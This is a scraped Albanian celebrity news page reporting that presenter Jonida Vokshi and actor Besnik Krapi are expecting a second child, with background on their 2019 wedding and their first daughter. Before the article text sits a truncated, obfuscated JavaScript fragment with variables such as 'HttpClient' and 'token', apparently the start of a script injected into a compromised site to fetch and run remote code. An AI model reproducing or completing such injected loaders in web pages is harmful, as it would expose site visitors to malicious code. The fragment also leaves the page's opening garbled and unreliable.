;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Jonida Vokshi në pritje të ëmbël?

By

Profesioni i takoi dhe dashuria i mbajti bashkë përgjithmonë.

Jonida Vokshi dhe Besnik Krapi martohen në shtator - Telegrafi

Jonida Vokshi dhe Besnik Krapi janë një nga çiftet më të dashur për publikun dhe dasma e tyre e vitit 2019 u ndoq me shumë kërshëri.

Në shtator të vitit 2019 dyshja kurorëzuan dashurinë e tyre me martesë në një dasmë tejet të këndshme. Ata organizuan dasmën në ambient të hapur në një prej resorteve në vijën e bregdetit Adriatik, konkretisht në Golem.

Si u njohën Jonida Vokshi dhe Besnik Krapi - KOHA.net

Viti 2020 mbetet përgjithmonë viti që ia ndryshoi jetën çiftit sepse ata mirëpritën në jetë fëmijën e tyre të parë, fryt i dashurisë së tyre të pashtershme.

Në qershor të vitit 2020, Jonida Vokshi dhe aktori nga Kosova, Besnik Krapi, u bërë prindër për herë të parë. Këtë e bëri të ditur vet aktori Krapi, i cili asokohe shpërndau lajmin për publikun në llogarinë e tij personale, Instagram.

“Zoti më ka takuar me një çikë shumë të bukur sot. Më ka marrë gjithë zemrën. Emrin e ka Emi. Në fillim ka qajtur shumë, poget kur e kuptoi kush jam dhe si dukem, por menjëherë jemi bërë shokë”, shkruante ai.

Jonida Vokshi dhe Besnik Krapi bëhen prindër: Zbulojnë emrin e bebushes -  Showbiz dhe TV

Ndërkaq tani, Besniku i përfshirë në shumë projekte premtuese dhe Jonida që drejton një format gjigant krah Alaudi Hamitit siç është Big Brother VIP Kosova, vitin 2023 do ta mbajnë mend sërish si një vit që ua ndryshoi jetën. Kjo sepse, çifti shumë i dashur janë në pritje të ëmbël. Kësaj here lajmin e bëri publik vetë prezantuesja gjatë Prime të BBVK.

Shumë urime çiftit! /Prive.al

Artikuj të ngjashëm